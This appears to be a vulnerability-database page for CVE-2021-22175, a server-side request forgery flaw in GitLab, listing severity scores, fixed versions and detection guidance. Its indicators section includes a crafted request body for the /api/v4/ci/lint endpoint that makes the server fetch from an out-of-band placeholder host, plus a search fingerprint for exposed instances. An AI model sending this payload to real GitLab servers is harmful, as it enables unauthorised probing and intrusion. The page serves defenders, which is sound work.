cbcvebase.
CVE-2021-22175
published 2021-06-11

CVE-2021-22175: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5…

PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-03-11
Exploited in the wild
EPSS
53.37%
98.9th percentile
When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled

Affected

8 ranges
VendorProductVersion rangeFixed in
debiangitlab< gitlab 15.10.8+ds1-2 (sid)gitlab 15.10.8+ds1-2 (sid)
gitlabgitlab
gitlabgitlab
gitlabgitlab
gitlabgitlab
gitlabgitlab>= 10.5.0 < 13.6.713.6.7
gitlabgitlab>= 13.7.0 < 13.7.713.7.7
gitlabgitlab>= 13.8.0 < 13.8.413.8.4

Detection & IOCsextracted from sources · hover to see the quote

urlPOST /api/v4/ci/lint HTTP/1.1
path/api/v4/ci/lint
path/api/v4/ci/lint?include_merged_yaml=true
command{"include_merged_yaml":true,"content":"include:\n remote: 'http://{{interactsh-url}}/gitlab.yml'"}
  • Detect unauthenticated POST requests to /api/v4/ci/lint containing a 'remote:' key pointing to internal/loopback addresses in the JSON body — this is the SSRF trigger endpoint for CVE-2021-22175.
  • Match HTTP 200 responses from /api/v4/ci/lint with a JSON body containing 'does not have valid YAML syntax!' — this indicates the server attempted to fetch the remote URL (SSRF triggered).
  • Monitor for unauthenticated POST requests to /api/v4/ci/lint with Content-Type: application/json, especially where the body includes 'include_merged_yaml' and a 'remote:' directive targeting internal network addresses.
  • Use out-of-band (OAST/interactsh) detection: if the GitLab server initiates an outbound HTTP request to an attacker-controlled host after receiving a crafted /api/v4/ci/lint POST, SSRF is confirmed.
  • Shodan/FOFA fingerprint for exposed GitLab instances: http.title:"GitLab" — use to identify potentially vulnerable internet-facing instances.
  • ·The SSRF vulnerability is only exploitable when 'requests to the internal network for webhooks' is enabled in GitLab instance settings. If this option is disabled, the attack surface is significantly reduced.
  • ·The vulnerability affects all GitLab CE/EE versions starting from 10.5. The Debian security tracker notes it was fixed in version 15.10.8+ds1-2 for the sid branch.
  • ·This CVE is part of a cluster of related SSRF vulnerabilities in GitLab fixed across separate patches; detections may also apply to CVE-2021-39935 and CVE-2021-22214 which share the same attack vector.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck6.8MEDIUM
cisa9.8CRITICAL
vendor_debian6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.